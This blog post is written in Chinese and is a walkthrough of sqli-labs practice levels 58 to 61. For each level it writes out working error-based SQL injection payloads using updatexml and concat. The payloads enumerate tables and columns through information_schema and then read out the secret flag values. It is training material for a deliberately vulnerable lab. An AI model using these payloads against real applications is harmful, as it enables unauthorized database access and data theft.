sqli-labs(58-61)-challenges-报错注入

58 5步内获得flag-报错注入-单引号

5步内获取flag?有点太高估我的能力了吧🤣

image-20210807164813533

1.id=2 and 1=2显示,不是数字型

2.?id=2'报错了,报错注入

image-20210807171619024

3.获取表名

?id=2' and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1)--+

image-20210807165532762

4.获取字段

?id=2' and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='exh9led8ch'),0x7e),1)--+

image-20210807165641521

5.获取flag

?id=2' and updatexml(1,concat(0x7e,(select secret_M7Y7 from exh9led8ch),0x7e),1)--+

image-20210807165750986

59 5步内获得flag--报错注入-数字型

1.?id=2 and 1=2不显示,数字型

2.?id=2 order by 4报错,采用爆错注入

3.获取表名

?id=2 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1)--+

image-20210807170948291

4.获得字段名

?id=2 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='con1m2e31e'),0x7e),1)--+

image-20210807171035189

5.获得密码

?id=2 and updatexml(1,concat(0x7e,(select secret_RG1Y from con1m2e31e),0x7e),1)--+

image-20210807171150262

60 5步获取flag-报错注入-双引号-括号

1.?id=2 and 1=2显示,不是数字型

2.?id=2"报错,还有括号,报错注入

image-20210808163926218

3.获取表名

?id=2") and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1) --+

image-20210808164128539

4.获取字段名

?id=2") and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='kd8yawz9zp'),0x7e),1) --+

image-20210808164255410

5.获取flag

?id=2") and updatexml(1,concat(0x7e,(select secret_HGKZ from kd8yawz9zp),0x7e),1) --+

image-20210808164408192

61 5步内获得flag-报错注入-单引号-双括号

1.?id=2 and 1=2正常显示,不是数字型

2.?id=2'报错,双括号,太坏了

image-20210808165004414

3.获取表名

?id=2')) and updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='challenges'),0x7e),1) --+

image-20210808165110869

4.获取字段名

?id=2')) and updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='challenges' and table_name='tsz8s22vir'),0x7e),1) --+

image-20210808165344096

5.获取flag

?id=2')) and updatexml(1,concat(0x7e,(select secret_7PXI from tsz8s22vir),0x7e),1) --+

image-20210808165435582

posted @ 2021-08-08 18:54  1ink  阅读(176)  评论(0)    收藏  举报